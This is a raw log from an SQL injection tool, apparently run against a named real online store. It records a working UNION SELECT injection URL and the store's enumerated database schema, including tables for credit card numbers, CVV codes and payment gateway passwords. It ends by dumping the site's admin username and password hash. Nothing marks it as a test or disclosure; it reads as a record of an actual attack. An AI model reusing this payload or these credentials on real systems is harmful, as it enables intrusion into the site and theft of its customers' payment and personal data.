[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:30:50
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log

[Database]: perfusion
[Table: Columns]
[0]config: ID,site_name,site_fullname,site_css,site_bgcolor,site_logolg,site_logosm,site_images,site_productimages,site_font1,site_font2,site_font3,site_font4,site_font5,site_color1,site_color2,site_color3,site_color4,site_color5,site_textcolor,site_copyright,site_address,site_address2,site_city,site_state,site_zip,site_fax,site_phone,site_email,site_url,site_notify,site_receipt,xSaleDiscount,xSalesTax,xShipRate,xHandling,receiptCopy,xIntShipRate,paymentgateway,send_receipt,send_notification,show_debug
[1]contacts: ID,firstname,lastname,address,address2,city,state,zip,phone,email,newsletter,entryDate
[2]gtwy_anet: ID,transkey,login,password,test_request,x_type,keepccard,x_processType,gatewayURL,x_Version,x_Merchant_Email,x_ADC_URL,x_ADC_delim_data,x_Delim_Data,x_description
[3]gtwy_linkpoint: ID,storeno,password,keyfile,gatewayURL,port,mode
[4]newsletter: ID,theSubject,box1,box2,box3,box4,box5,entryDate
[5]tblcalendar: ID,title,leadin,articlebody,articledate,entryDate,isactive,location,purchaseurl,moreurl,onhome,type,moreinfourl,fee,time
[6]tblcase: id,casetype
[7]tblcategories: ID,hidden,category,parent,description,image,titleimage,displayorder
[8]tblcontacts: ID,FirstName,LastName,Email,Phone,Fax,Address,City,Zip,State,bestContact,comments,postcard,referral,entryDate,optin
[9]tblcustomers: ID,firstname,lastname,address1,address2,city,state,zip,country,company,phone,fax,email,website,sfirstname,slastname,saddress1,saddress2,scity,sstate,szip,scountry,scompany,sphone,sfax,notes,newsletter,entryDate,lastUpdated
[10]tbllinks: ID,onhome,isactive,linkname,description,url
[11]tblmakes: ID,name
[12]tblmediaaccess: ID,uname,pword,disabled
[13]tblnews: ID,title,leadin,articlebody,articledate,entryDate,isactive,byline,bylineurl,moreurl,onhome,attachment
[14]tblorderitems: ID,RelOrderID,RelProductID,Quantity,Size,RelUnitPrice,Options,Shipping,Discount,Processed,Status,Title
[15]tblorders: OrderID,uuid,customerid,dealer,dealerRep,dealerPO,CCNum,CCName,CCYear,CCMonth,CCType,CVSNum,SaleSubTotal,SaleTotal,Tax,handling,Shipping,ShippingTotal,Discount,DiscountRate,UPS,IntlFee,ShippingMethod,Status,DateIn,TimeIn,bFirstName,bLastName,bAddress1,bAddress2,bCity,bCounty,bState,bZip,bPhone,sFirstName,sLastName,sAddress1,sAddress2,sCity,sState,sCounty,sZip,sPhone,sCountry,bCountry,Message,bFax,sFax,bCompany,sCompany,bEmail,sEmail,ipaddress,oAuthorization,lastModified,shippingdate,intorder
[16]tblpaymentgateway: ID,gateway,name,tablename,module
[17]tblproducts: ID,isactive,onsale,product,sku,price,saleprice,listprice,category,has_sizes,description,weight,shipping,status,feature1,feature2,feature3,feature4,image1,image2,image3,image4,entryDate,lastmodified
[18]tblsitecontent: ID,section,content
[19]tblstatus: id,status
[20]tblstyle: id,style
[21]tbltypes: ID,name
[22]tbluserlog: fldauto,fldusername,fldinout,fldipaddress,entryDateTime
[23]tbluserroles: UserRoleID,UserRoleName,UserRoleType,UserRoleFunction
[24]tbluserroletypes: ID,UserRoleType
[25]tblusers: UserID,lastname,firstname,permission,username,password,email,comments,roles,disabled,superUser,lastlogin

[-] [20:39:01]
[-] Total URL Requests 311
[-] Done


[+] URL:http://www.theperfusionstore.com/shop/detail.php?cat=4&ID=13+AND+1=2+UNION+SELECT+sqli,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23--
[+] Evasion Used: "+" "--"
[+] 20:40:01
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: perfusion
User: perfusion@48-47.84.64.master-link.com
Version: 5.0.45-Debian_1ubuntu3.1-log
[+] Dumping data from database "perfusion" Table "tblusers"
[+] Column(s) ['username', 'password']
[+] Number of Rows: 1

[0] admin:85c51eef704f837ab85006998db06448:

[-] [20:40:07]
[-] Total URL Requests 3
[-] Done